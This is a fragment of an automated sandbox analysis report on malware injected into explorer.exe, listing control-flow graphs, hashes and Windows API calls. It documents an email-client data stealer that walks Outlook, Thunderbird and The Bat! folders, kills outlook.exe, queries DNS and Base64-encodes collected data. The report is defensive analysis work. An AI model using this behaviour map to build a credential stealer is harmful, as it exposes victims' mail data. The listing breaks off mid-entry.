                        • Instruction ID: 325d3da0b7a9a84afe3faaf0573e73c78ccd1a04f38aab8114a9966ac133d40c
                        • Opcode Fuzzy Hash: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                        • Instruction Fuzzy Hash: 9D417F30318B4C4FDB94FB3998997AE73D6FBD8740F448A29A44AC3391EE78D9048781

                        Control-flow Graph

                        APIs
                        • NtUnmapViewOfSection.NTDLL ref: 009838F2
                        Memory Dump Source
                        • Source File: 00000007.00000002.1944428981.0000000000981000.00000040.80000000.00040000.00000000.sdmp, Offset: 00981000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_981000_explorer.jbxd
                        Similarity
                        • API ID: SectionUnmapView
                        • String ID:
                        • API String ID: 498011366-0
                        • Opcode ID: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                        • Instruction ID: dc63b9085b87cf2e8e2c01f4cf1c4c7b39c8201709e428cbea29b9270c11d77b
                        • Opcode Fuzzy Hash: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                        • Instruction Fuzzy Hash: 53F0E520F11A080BEFAC77BD685D3382288EB98310F508629F515D33D2DC3D8E468301

                        Control-flow Graph

                        APIs
                        • RegOpenKeyExW.KERNELBASE ref: 009827C7
                        • RegQueryValueExW.KERNELBASE ref: 009827F4
                        • RegQueryValueExW.KERNELBASE ref: 0098283A
                        • RegCloseKey.KERNELBASE ref: 00982860
                          • Part of subcall function 00981860: RtlDeleteBoundaryDescriptor.NTDLL ref: 00981880
                        Memory Dump Source
                        • Source File: 00000007.00000002.1944428981.0000000000981000.00000040.80000000.00040000.00000000.sdmp, Offset: 00981000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_981000_explorer.jbxd
                        Similarity
                        • API ID: QueryValue$BoundaryCloseDeleteDescriptorOpen
                        • String ID:
                        • API String ID: 3453524928-0
                        • Opcode ID: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                        • Instruction ID: 587fad6b4036330ff2011fe59c6b15879dedd709178a1dee398ff97f89d3a70d
                        • Opcode Fuzzy Hash: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                        • Instruction Fuzzy Hash: 5B31A67020CB488FEB68EF29D45977A77E4FBE8355F54062EE48AC2364DF24C8468742

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.1944428981.0000000000981000.00000040.80000000.00040000.00000000.sdmp, Offset: 00981000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_981000_explorer.jbxd
                        Similarity
                        • API ID: CloseCreate
                        • String ID: ?
                        • API String ID: 2932200918-1684325040
                        • Opcode ID: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                        • Instruction ID: 2f539629b779b33a9be4ac5a4c29fbbb303a1f4a2fe4ea498611014290202682
                        • Opcode Fuzzy Hash: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                        • Instruction Fuzzy Hash: E1118E70608B488FD750EF29D48866AB7E1FB98305F40062EE48AC3320DF38D985CB82

                        Control-flow Graph

                        APIs
                        • LoadLibraryA.KERNELBASE ref: 0098A397
                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0098A441
                        • VirtualProtect.KERNELBASE ref: 0098A45F
                        Memory Dump Source
                        • Source File: 00000007.00000002.1944428981.0000000000989000.00000040.80000000.00040000.00000000.sdmp, Offset: 00989000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_989000_explorer.jbxd
                        Similarity
                        • API ID: ProtectVirtual$LibraryLoad
                        • String ID:
                        • API String ID: 895956442-0
                        • Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                        • Instruction ID: 86abad3b222c2871a7321b49b8ca5a416f76deb2b5775b64567ea95ee877ca90
                        • Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                        • Instruction Fuzzy Hash: F651593275891E4BEB24BB7C9CC47F5B3D1F769321B180A2BD49AC3385E559D8468383

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 87 983254-983287 call 98298c 90 98343a-983456 87->90 91 98328d-983297 call 98298c 87->91 91->90 94 98329d-9832aa call 98272c 91->94 97 9832ac-9832b3 94->97 98 9832b5 94->98 99 9832b7-9832c2 call 982688 97->99 98->99 102 9832c8-9832fe call 982688 call 981838 * 2 call 982938 99->102 103 98342c-983435 call 9830a8 99->103 113 98340c-983427 call 981860 * 4 102->113 114 983304-983318 GetPrivateProfileSectionNamesW 102->114 103->90 113->103 114->113 116 98331e-983326 114->116 116->113 117 98332c-98332f 116->117 117->113 119 983335-983348 117->119 124 98334e-983377 GetPrivateProfileStringW 119->124 125 9833f0-983406 119->125 124->125 127 983379-983398 GetProfileIntW 124->127 125->113 125->117 130 98339a-9833ad call 982688 127->130 131 9833e5-9833eb call 9830a8 127->131 135 9833af-9833b3 130->135 136 9833c6-9833e3 call 9830a8 call 981860 130->136 131->125 137 9833bd-9833c4 135->137 138 9833b5-9833ba 135->138 136->125 137->135 137->136 138->137
                        APIs
                          • Part of subcall function 0098298C: GetFileAttributesW.KERNELBASE ref: 0098299E
                        • GetPrivateProfileSectionNamesW.KERNEL32 ref: 0098330F
                        • GetPrivateProfileStringW.KERNEL32 ref: 0098336F
                        • GetProfileIntW.KERNEL32 ref: 0098338C
                          • Part of subcall function 009830A8: FindFirstFileW.KERNELBASE ref: 00983104
                          • Part of subcall function 00981860: RtlDeleteBoundaryDescriptor.NTDLL ref: 00981880
                        Memory Dump Source
                        • Source File: 00000007.00000002.1944428981.0000000000981000.00000040.80000000.00040000.00000000.sdmp, Offset: 00981000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_981000_explorer.jbxd
                        Similarity
                        • API ID: Profile$FilePrivate$AttributesBoundaryDeleteDescriptorFindFirstNamesSectionString
                        • String ID:
                        • API String ID: 1903369626-0
                        • Opcode ID: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                        • Instruction ID: f8f670b172a7ee10ee054fe6036810529771f56cc3ecf7f81d6b64a89fae4d59
                        • Opcode Fuzzy Hash: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                        • Instruction Fuzzy Hash: 6951C930718F094FDB59BB3D985677933D6EBD8700B84456EE40AC33A6EE64DD428386

                        Control-flow Graph

                        APIs
                        • StrStrIW.KERNELBASE ref: 0098347E
                        • RegOpenKeyExW.KERNELBASE ref: 0098353F
                        • RegEnumKeyExW.KERNELBASE ref: 009835D6
                          • Part of subcall function 00982774: RegOpenKeyExW.KERNELBASE ref: 009827C7
                          • Part of subcall function 00982774: RegQueryValueExW.KERNELBASE ref: 009827F4
                          • Part of subcall function 00982774: RegQueryValueExW.KERNELBASE ref: 0098283A
                          • Part of subcall function 00982774: RegCloseKey.KERNELBASE ref: 00982860
                          • Part of subcall function 00983254: GetPrivateProfileSectionNamesW.KERNEL32 ref: 0098330F
                          • Part of subcall function 00981860: RtlDeleteBoundaryDescriptor.NTDLL ref: 00981880
                        Memory Dump Source
                        • Source File: 00000007.00000002.1944428981.0000000000981000.00000040.80000000.00040000.00000000.sdmp, Offset: 00981000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_981000_explorer.jbxd
                        Similarity
                        • API ID: OpenQueryValue$BoundaryCloseDeleteDescriptorEnumNamesPrivateProfileSection
                        • String ID:
                        • API String ID: 2369215640-0
                        • Opcode ID: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                        • Instruction ID: 4a51f0955a73b86546843399de5e4e1e34b1956b5eb0b7e20fc2bf2a2432018a
                        • Opcode Fuzzy Hash: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                        • Instruction Fuzzy Hash: EA415730718B084FDB98FF6D849972AB6E6FBD8741F00496EA14EC3361DE34D9458B82

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 232 982938-982943 233 982984 232->233 234 982945-982948 232->234 236 982986-98298b 233->236 234->233 235 98294a-982970 CreateFileW 234->235 237 982980-982982 235->237 238 982972-98297a FindCloseChangeNotification 235->238 237->236 238->237
                        APIs
                        • CreateFileW.KERNELBASE ref: 00982966
                        • FindCloseChangeNotification.KERNELBASE ref: 0098297A
                        Memory Dump Source
                        • Source File: 00000007.00000002.1944428981.0000000000981000.00000040.80000000.00040000.00000000.sdmp, Offset: 00981000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_981000_explorer.jbxd
                        Similarity
                        • API ID: ChangeCloseCreateFileFindNotification
                        • String ID:
                        • API String ID: 727422849-0
                        • Opcode ID: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                        • Instruction ID: 1d8a231b7867b036719b59bfaeaaee73a2e176fe05d3030dcbffe7c2255cf09c
                        • Opcode Fuzzy Hash: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                        • Instruction Fuzzy Hash: 1CF09B7021570A4FE7547FB94598336B5D4FB48355F18473DE46AC23D0D73A89468742

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 251 98298c-982997 252 982999-98299c 251->252 253 9829b5 251->253 252->253 254 98299e-9829a7 GetFileAttributesW 252->254 255 9829b7-9829bc 253->255 256 9829a9-9829af 254->256 257 9829b1-9829b3 254->257 256->257 257->255
                        APIs
                        • GetFileAttributesW.KERNELBASE ref: 0098299E
                        Memory Dump Source
                        • Source File: 00000007.00000002.1944428981.0000000000981000.00000040.80000000.00040000.00000000.sdmp, Offset: 00981000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_981000_explorer.jbxd
                        Similarity
                        • API ID: AttributesFile
                        • String ID:
                        • API String ID: 3188754299-0
                        • Opcode ID: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                        • Instruction ID: f097b861846bf5aa4b393aeed6c1f71201a2301ddbbdfd18ff249a52409c9a1b
                        • Opcode Fuzzy Hash: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                        • Instruction Fuzzy Hash: 73D0A732712915077B6437F90ADD27130A8D71932AF14033AEA36C13E0E28FCCD5A301

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 258 981860-981870 call 981ad4 261 981872-981880 RtlDeleteBoundaryDescriptor 258->261 262 981886-98188b 258->262 261->262
                        APIs
                        • RtlDeleteBoundaryDescriptor.NTDLL ref: 00981880
                        Memory Dump Source
                        • Source File: 00000007.00000002.1944428981.0000000000981000.00000040.80000000.00040000.00000000.sdmp, Offset: 00981000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_981000_explorer.jbxd
                        Similarity
                        • API ID: BoundaryDeleteDescriptor
                        • String ID:
                        • API String ID: 3203483114-0
                        • Opcode ID: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                        • Instruction ID: 41e37559a9d92cc9a266f07babbd7a667df196715fdfd3cdff96bfe6396d8111
                        • Opcode Fuzzy Hash: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                        • Instruction Fuzzy Hash: 7BD01224716A040BEF6CBBFA5C8E2747ADAE798212B188065B819C3351DD39C896C341

                        Execution Graph

                        Execution Coverage:14.4%
                        Dynamic/Decrypted Code Coverage:96.2%
                        Signature Coverage:3.8%
                        Total number of Nodes:212
                        Total number of Limit Nodes:2
                        execution_graph 826 832013 827 832036 826->827 828 832029 lstrlen 826->828 837 8329b7 GetProcessHeap RtlAllocateHeap 827->837 828->827 830 83203e lstrcat 831 832073 lstrcat 830->831 832 83207a 830->832 831->832 838 8320a7 832->838 835 832999 3 API calls 836 83209d 835->836 837->830 872 832415 838->872 842 8320d4 877 832938 lstrlen MultiByteToWideChar 842->877 844 8320e3 878 8324cc RtlZeroMemory 844->878 847 832135 RtlZeroMemory 849 83216a 847->849 848 832999 3 API calls 850 83208a 848->850 853 8323f7 849->853 855 832198 849->855 880 83243d 849->880 850->835 852 8323dd 852->853 854 832999 3 API calls 852->854 853->848 854->853 855->852 889 8329b7 GetProcessHeap RtlAllocateHeap 855->889 857 832268 wsprintfW 858 83228e 857->858 862 8322fb 858->862 890 8329b7 GetProcessHeap RtlAllocateHeap 858->890 860 8322c8 wsprintfW 860->862 861 8323ba 863 832999 3 API calls 861->863 862->861 891 8329b7 GetProcessHeap RtlAllocateHeap 862->891 864 8323ce 863->864 864->852 866 832999 3 API calls 864->866 866->852 867 8323b3 870 832999 3 API calls 867->870 868 832346 868->867 892 83296b VirtualAlloc 868->892 870->861 871 8323a0 RtlMoveMemory 871->867 873 8320c6 872->873 874 83241f 872->874 876 8329b7 GetProcessHeap RtlAllocateHeap 873->876 893 832818 lstrlen lstrlen 874->893 876->842 877->844 879 8320f3 878->879 879->847 879->853 881 8324ab 880->881 883 83244a 880->883 881->855 882 83244e DnsQuery_W 882->883 883->881 883->882 884 83248d DnsFree inet_ntoa 883->884 884->883 885 8324ad 884->885 895 8329b7 GetProcessHeap RtlAllocateHeap 885->895 887 8324b7 896 832938 lstrlen MultiByteToWideChar 887->896 889->857 890->860 891->868 892->871 894 832839 893->894 894->873 895->887 896->881 673 831000 674 831010 673->674 675 831007 673->675 677 831016 675->677 685 8327e2 VirtualQuery 677->685 680 831022 680->674 682 83102e RtlMoveMemory NtUnmapViewOfSection 688 83104f 682->688 686 83101e 685->686 686->680 687 8329b7 GetProcessHeap RtlAllocateHeap 686->687 687->682 727 8329b7 GetProcessHeap RtlAllocateHeap 688->727 690 83105c 728 8329b7 GetProcessHeap RtlAllocateHeap 690->728 692 83106b ExpandEnvironmentStringsW 693 831085 692->693 694 83108c ExpandEnvironmentStringsW 692->694 729 83123a 693->729 696 8310a0 ExpandEnvironmentStringsW 694->696 697 831099 694->697 699 8310b4 SHGetSpecialFolderPathW 696->699 700 8310ad 696->700 698 83123a 24 API calls 697->698 698->696 701 8310c5 699->701 702 8310cc ExpandEnvironmentStringsW 699->702 703 83123a 24 API calls 700->703 704 83123a 24 API calls 701->704 705 8310e0 ExpandEnvironmentStringsW 702->705 706 8310d9 702->706 703->699 704->702 708 8310f4 ExpandEnvironmentStringsW 705->708 709 8310ed 705->709 736 8311cc 706->736 711 831101 708->711 712 831108 ExpandEnvironmentStringsW 708->712 751 831192 709->751 713 831192 16 API calls 711->713 714 831115 712->714 715 83111c ExpandEnvironmentStringsW 712->715 713->712 716 831192 16 API calls 714->716 717 831130 715->717 718 831129 715->718 716->715 758 832999 717->758 719 831192 16 API calls 718->719 719->717 722 831187 ExitProcess 724 83114e 725 83117f 724->725 726 831158 wsprintfA 724->726 725->722 726->725 726->726 727->690 728->692 764 83274a CreateToolhelp32Snapshot 729->764 734 83255c 16 API calls 735 831268 734->735 735->694 737 83255c 16 API calls 736->737 738 8311e6 737->738 739 83255c 16 API calls 738->739 740 8311f3 739->740 741 83255c 16 API calls 740->741 742 831200 741->742 743 83255c 16 API calls 742->743 744 83120d 743->744 745 83255c 16 API calls 744->745 746 83121a 745->746 747 83255c 16 API calls 746->747 748 831227 747->748 749 83255c 16 API calls 748->749 750 831234 749->750 750->705 752 83255c 16 API calls 751->752 753 8311ac 752->753 754 83255c 16 API calls 753->754 755 8311b9 754->755 756 83255c 16 API calls 755->756 757 8311c6 756->757 757->708 759 8327e2 VirtualQuery 758->759 760 8329a1 759->760 761 831137 760->761 762 8329a5 GetProcessHeap HeapFree 760->762 761->722 763 8329b7 GetProcessHeap RtlAllocateHeap 761->763 762->761 763->724 765 832765 Process32First 764->765 766 831249 764->766 767 8327ae 765->767 773 83255c 766->773 768 8327b2 FindCloseChangeNotification 767->768 769 83277f lstrcmpiA 767->769 768->766 770 8327a0 Process32Next 769->770 771 832795 769->771 770->767 788 8327be OpenProcess 771->788 791 8329b7 GetProcessHeap RtlAllocateHeap 773->791 775 83257a lstrcatW PathAppendW 776 8325a2 FindFirstFileW 775->776 777 83265d 775->777 778 832999 3 API calls 777->778 780 83125b 778->780 779 8325bd RtlZeroMemory 779->786 780->734 781 83260f lstrcatW PathAppendW 782 83263e FindNextFileW 781->782 783 832627 StrStrIW 781->783 782->779 784 832652 FindClose 782->784 783->782 783->786 784->777 785 8325df lstrcatW PathAppendW 785->782 785->786 786->779 786->781 786->782 786->785 787 83255c 5 API calls 786->787 787->786 789 8327e0 788->789 790 8327d0 TerminateProcess CloseHandle 788->790 789->770 790->789 791->775 897 832917 lstrlenW WideCharToMultiByte 811 839cf6 812 839caf 811->812 812->811 813 839f00 VirtualProtect VirtualProtect 812->813 814 839ec9 812->814 813->814 814->814 792 839d24 794 839caf 792->794 793 839f00 VirtualProtect VirtualProtect 795 839ec9 793->795 794->793 794->795 815 8318f4 CreateFileW 816 831919 GetFileSize 815->816 817 83196d 815->817 818 831965 CloseHandle 816->818 819 831929 816->819 818->817 819->818 825 8329b7 GetProcessHeap RtlAllocateHeap 819->825 821 831936 ReadFile 824 83194b 821->824 822 832999 3 API calls 823 831964 822->823 823->818 824->822 825->821 915 831e44 916 831e5b lstrlen CharLowerBuffA 915->916 923 831eb3 915->923 917 831e75 916->917 920 831e9d 916->920 918 831e7f lstrcmpiA 917->918 917->920 918->917 918->923 919 8326a9 922 831ece 8 API calls 920->922 920->923 921 832692 lstrlen RtlMoveMemory 921->919 922->923 923->919 923->921 796 83118f 797 831192 796->797 798 83255c 16 API calls 797->798 799 8311ac 798->799 800 83255c 16 API calls 799->800 801 8311b9 800->801 802 83255c 16 API calls 801->802 803 8311c6 802->803 898 831e3e 899 831e5b lstrlen CharLowerBuffA 898->899 904 831eb3 898->904 900 831e75 899->900 905 831e9d 899->905 901 831e7f lstrcmpiA 900->901 900->905 901->900 901->904 902 8326a9 903 832692 lstrlen RtlMoveMemory 903->902 904->902 904->903 905->904 907 831ece StrStrIA 905->907 908 831ef5 RtlMoveMemory RtlMoveMemory StrStrIA 907->908 909 831eee 907->909 908->909 910 831f37 StrStrIA 908->910 909->904 910->909 911 831f4a StrStrIA 910->911 911->909 912 831f5d lstrlen 911->912 912->909 913 831f6a 912->913 913->909 914 831f9b lstrlen 913->914 914->909 914->913 804 8326ac lstrlen 805 8326f3 804->805 806 8326c4 CryptBinaryToStringA 804->806 806->805 807 8326d7 806->807 810 8329b7 GetProcessHeap RtlAllocateHeap 807->810 809 8326e2 CryptBinaryToStringA 809->805 810->809 924 83295c VirtualFree

                        Control-flow Graph

                        APIs
                          • Part of subcall function 008329B7: GetProcessHeap.KERNEL32(00000008,00000412,0083257A,008318F4), ref: 008329BA
                          • Part of subcall function 008329B7: RtlAllocateHeap.NTDLL(00000000), ref: 008329C1
                        • lstrcatW.KERNEL32(00000000), ref: 00832588
                        • PathAppendW.SHLWAPI(00000000,*.*,?,008318F4), ref: 00832594
                        • FindFirstFileW.KERNELBASE(00000000,?,?,008318F4), ref: 008325A8
                        • RtlZeroMemory.NTDLL(00000209,00000209), ref: 008325C3
                        • lstrcatW.KERNEL32(00000209,?), ref: 008325E1
                        • PathAppendW.SHLWAPI(00000209,?,?,008318F4), ref: 008325ED
                        • lstrcatW.KERNEL32(00000209,?), ref: 00832611
                        • PathAppendW.SHLWAPI(00000209,?,?,008318F4), ref: 0083261D
                        • StrStrIW.SHLWAPI(00000209,?,?,008318F4), ref: 0083262C
                        • FindNextFileW.KERNELBASE(00000000,?,?,008318F4), ref: 00832644
                        • FindClose.KERNELBASE(00000000,?,008318F4), ref: 00832653
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.1955587460.0000000000831000.00000040.80000000.00040000.00000000.sdmp, Offset: 00831000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_831000_explorer.jbxd
                        Similarity
                        • API ID: AppendFindPathlstrcat$FileHeap$AllocateCloseFirstMemoryNextProcessZero
                        • String ID: *.*
                        • API String ID: 1648349226-438819550
                        • Opcode ID: f9fa6071d872589d0f7b43af970034eb7f8c5750e0046ad7c28ff78f66a6ec36
                        • Instruction ID: 7428086dba394464508dc642ebd078fce205ff1e5d81e13fa9b7c9f8cc64d159
                        • Opcode Fuzzy Hash: f9fa6071d872589d0f7b43af970034eb7f8c5750e0046ad7c28ff78f66a6ec36
                        • Instruction Fuzzy Hash: D4219C71204705AFD714AF24AD59E6FBBACFFD5700F00091CFA51E2161EB388A068BE6

                        Control-flow Graph

                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00832758
                        • Process32First.KERNEL32(00000000,?), ref: 00832777
                        • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0083278B
                        • Process32Next.KERNEL32(00000000,00000128), ref: 008327A8
                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 008327B3
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.1955587460.0000000000831000.00000040.80000000.00040000.00000000.sdmp, Offset: 00831000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_831000_explorer.jbxd
                        Similarity
                        • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcmpi
                        • String ID: outlook.exe
                        • API String ID: 545148253-749849299
                        • Opcode ID: 22d55fbb54ad4e405dc07683978c2a7e3c3229114f80f33afaddf8a7ebb02578
                        • Instruction ID: f93a34e00094a3c89f39f1df0200fdc86f5c622ea51832fb6bb4c4cc4d9f75a1
                        • Opcode Fuzzy Hash: 22d55fbb54ad4e405dc07683978c2a7e3c3229114f80f33afaddf8a7ebb02578
                        • Instruction Fuzzy Hash: 4FF09630502528ABD724AB74DC49FEA777CFB88721F000590E859E2190DB348F554ED1

                        Control-flow Graph

                        APIs
                          • Part of subcall function 008327E2: VirtualQuery.KERNEL32(00000000,00000209,0000001C,00000209,00832664,?,008318F4), ref: 008327EF
                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 0083103A
                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00831043
                        Memory Dump Source
                        • Source File: 00000008.00000002.1955587460.0000000000831000.00000040.80000000.00040000.00000000.sdmp, Offset: 00831000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_831000_explorer.jbxd
                        Similarity
                        • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                        • String ID:
                        • API String ID: 1675517319-0
                        • Opcode ID: 5714876d5f4f5d233b0cf5fd7f7eadcd2d9355ed17bc69ef11c7726dbb52483f
                        • Instruction ID: 75432cf11c2a406054f94ae66489d347921f73dbecd23daa3147fc080c20d2bf
                        • Opcode Fuzzy Hash: 5714876d5f4f5d233b0cf5fd7f7eadcd2d9355ed17bc69ef11c7726dbb52483f
                        • Instruction Fuzzy Hash: F3D05E31801660B7CE68777CBC6EADA2A48FFC5730F244A11B525D21D2C9354A8087F1

                        Control-flow Graph

                        APIs
                          • Part of subcall function 008329B7: GetProcessHeap.KERNEL32(00000008,00000412,0083257A,008318F4), ref: 008329BA
                          • Part of subcall function 008329B7: RtlAllocateHeap.NTDLL(00000000), ref: 008329C1
                        • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0083104E,?,00831010), ref: 0083107F
                        • ExpandEnvironmentStringsW.KERNEL32(%LOCALAPPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0083104E,?,00831010), ref: 00831093
                        • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\Microsoft\Outlook,00000000,00000208,?,?,?,0083104E,?,00831010), ref: 008310A7
                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000005,00000000,?,?,?,0083104E,?,00831010), ref: 008310BB
                        • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Thunderbird,00000000,00000208,?,?,?,0083104E,?,00831010), ref: 008310D3
                        • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\The Bat!,00000000,00000208,?,?,?,0083104E,?,00831010), ref: 008310E7
                        • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\The Bat!,00000000,00000208,?,?,?,0083104E,?,00831010), ref: 008310FB
                        • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\BatMail,00000000,00000208,?,?,?,0083104E,?,00831010), ref: 0083110F
                        • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\BatMail,00000000,00000208,?,?,?,0083104E,?,00831010), ref: 00831123
                        • wsprintfA.USER32 ref: 0083116B
                        • ExitProcess.KERNEL32 ref: 00831189
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.1955587460.0000000000831000.00000040.80000000.00040000.00000000.sdmp, Offset: 00831000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_831000_explorer.jbxd
                        Similarity
                        • API ID: EnvironmentExpandStrings$HeapProcess$AllocateExitFolderPathSpecialwsprintf
                        • String ID: %ALLUSERSPROFILE%\BatMail$%ALLUSERSPROFILE%\Microsoft\Outlook$%ALLUSERSPROFILE%\The Bat!$%APPDATA%\BatMail$%APPDATA%\Microsoft\Outlook$%APPDATA%\The Bat!$%APPDATA%\Thunderbird$%LOCALAPPDATA%\Microsoft\Outlook$%s,
                        • API String ID: 1709485025-1688604020
                        • Opcode ID: 8291d8e95b2c3c40437eb420a80fb55996d48a36fa8b282ba9a0c8568a9a4f8c
                        • Instruction ID: d6cf2b8fe7bac4cd1753297f33c6a20761de08383f13ec2acf6b182b9102d539
                        • Opcode Fuzzy Hash: 8291d8e95b2c3c40437eb420a80fb55996d48a36fa8b282ba9a0c8568a9a4f8c
                        • Instruction Fuzzy Hash: A531BC513416292AEE2533694C5EFBF684DFFD0F90F054124BA16DA382DE598E0186F6

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 82 839cf6-839d10 83 839d15 82->83 84 839d16-839d28 83->84 86 839d2a 84->86 87 839d8e-839d8f 84->87 88 839caf-839cbd 86->88 89 839d2c-839d36 86->89 90 839d90-839d95 87->90 92 839cd1-839cf4 88->92 93 839cbf-839cce 88->93 89->83 91 839d38-839d43 89->91 94 839d96-839d98 90->94 95 839d44-839d4c 91->95 92->82 93->92 96 839da1 94->96 97 839d9a-839d9f 94->97 95->95 98 839d4e-839d50 95->98 96->90 99 839da3 96->99 97->96 101 839d52-839d55 98->101 102 839d79-839d88 98->102 100 839da8-839daa 99->100 103 839db3-839db7 100->103 104 839dac-839db1 100->104 101->84 105 839d57-839d75 101->105 102->97 103->100 106 839db9 103->106 104->103 105->102 107 839f3d 105->107 108 839dc4-839dc9 106->108 109 839dbb-839dc2 106->109 107->107 110 839dcb-839dd4 108->110 111 839dd8-839dda 108->111 109->100 109->108 112 839dd6 110->112 113 839e4a-839e4d 110->113 114 839de3-839de7 111->114 115 839ddc-839de1 111->115 112->111 116 839e52-839e55 113->116 117 839df0-839df2 114->117 118 839de9-839dee 114->118 115->114 119 839e57-839e59 116->119 120 839e14-839e23 117->120 121 839df4 117->121 118->117 119->116 124 839e5b-839e5e 119->124 122 839e25-839e2c 120->122 123 839e34-839e41 120->123 125 839df5-839df7 121->125 122->122 126 839e2e 122->126 123->123 127 839e43-839e45 123->127 124->116 128 839e60-839e7c 124->128 129 839e00-839e04 125->129 130 839df9-839dfe 125->130 126->94 127->94 128->119 132 839e7e 128->132 129->125 131 839e06 129->131 130->129 133 839e11 131->133 134 839e08-839e0f 131->134 135 839e84-839e88 132->135 133->120 134->125 134->133 136 839e8a-839ea0 135->136 137 839ecf-839ed2 135->137 143 839ea1-839ea6 136->143 138 839ed5-839edc 137->138 140 839f00-839f30 VirtualProtect * 2 138->140 141 839ede-839ee0 138->141 142 839f34-839f38 140->142 144 839ef3-839efe 141->144 145 839ee2-839ef1 141->145 142->142 146 839f3a 142->146 143->135 147 839ea8-839eaa 143->147 144->145 145->138 146->107 148 839eb3-839ec0 147->148 149 839eac-839eb2 147->149 151 839ec2-839ec7 148->151 152 839ec9-839ecc 148->152 149->148 151->143
                        Memory Dump Source
                        • Source File: 00000008.00000002.1955587460.0000000000838000.00000040.80000000.00040000.00000000.sdmp, Offset: 00838000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_838000_explorer.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5331aa2ca988823c02e1fcba19f9ecdb7256819dccc042b70424aabed4244430
                        • Instruction ID: 15ebe856fb7e0a3767806e04aace779e67b0c710a9650f5a807ace1f3923d730
                        • Opcode Fuzzy Hash: 5331aa2ca988823c02e1fcba19f9ecdb7256819dccc042b70424aabed4244430
                        • Instruction Fuzzy Hash: 859139725593914FD7169E78CCC16B5BBA0FB92324F2C06A9C8D1CB386E7E4580AC7E0

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 162 8329b7-8329c7 GetProcessHeap RtlAllocateHeap
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000412,0083257A,008318F4), ref: 008329BA
                        • RtlAllocateHeap.NTDLL(00000000), ref: 008329C1
                        Memory Dump Source
                        • Source File: 00000008.00000002.1955587460.0000000000831000.00000040.80000000.00040000.00000000.sdmp, Offset: 00831000, based on PE: false
                        Joe Sandbox IDA Plugin
